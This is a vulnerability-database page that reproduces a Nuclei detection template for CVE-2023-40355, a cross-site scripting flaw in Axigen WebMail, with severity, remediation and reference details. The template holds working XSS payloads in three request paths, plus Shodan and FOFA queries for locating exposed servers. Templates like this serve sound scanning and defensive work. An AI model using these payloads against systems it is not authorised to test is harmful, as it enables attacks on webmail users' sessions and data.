| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| Exploit for Cross-site Scripting in Axigen Axigen_Mobile_Webmail | 1 May 202517:16 | – | githubexploit | |
| CVE-2023-40355 | 7 Feb 202409:31 | – | circl | |
| Axigen Cross-Site Scripting Vulnerability | 7 Feb 202400:00 | – | cnnvd | |
| CVE-2023-40355 | 7 Feb 202400:00 | – | cve | |
| CVE-2023-40355 | 7 Feb 202400:00 | – | cvelist | |
| CVE-2023-40355 | 7 Feb 202408:15 | – | nvd | |
| CVE-2023-40355 | 7 Feb 202408:15 | – | osv | |
| Cross site scripting | 7 Feb 202408:15 | – | prion | |
| PT-2024-12887 · Axigen · Axigen | 7 Feb 202400:00 | – | ptsecurity | |
| CVE-2023-40355 | 23 May 202504:43 | – | redhatcve |
id: CVE-2023-40355
info:
name: Axigen WebMail - Cross-Site Scripting
author: amir-h-fallahi
severity: medium
description: |
Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.
impact: |
Authenticated attackers can inject malicious JavaScript through various parameters in the version switching logic, potentially stealing email credentials and accessing sensitive communications of Axigen webmail users.
remediation: |
Update Axigen to version 10.3.3.59, 10.4.19, or 10.5.5 or later that properly sanitizes input parameters in the version switching logic.
reference:
- https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-40355
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2023-40355
cwe-id: CWE-79
epss-score: 0.0109
epss-percentile: 0.61189
cpe: cpe:2.3:a:axigen:axigen_mobile_webmail:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: axigen
product: axigen_mobile_webmail
shodan-query: http.favicon.hash:-1247684400
fofa-query: icon_hash=-1247684400
tags: cve,cve2023,xss,axigen,webmail,vuln
http:
- method: GET
path:
- "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//"
- "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//"
- "{{BaseURL}}/index.hsp?m=',alert(document.domain),'"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\\\\'-alert(document.domain),//"
- "',alert(document.domain),'"
condition: or
- type: dsl
dsl:
- 'contains(header, "text/html")'
- 'contains(response, "Axigen")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100c87dd10d0ea21f7d4874a76ae3302cf94a9787695243e3115cd06bb64e8826b8022059289b9a4443238a0d5fbcd51434bb99223f7e448266cd8058f17d0206e53d0e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation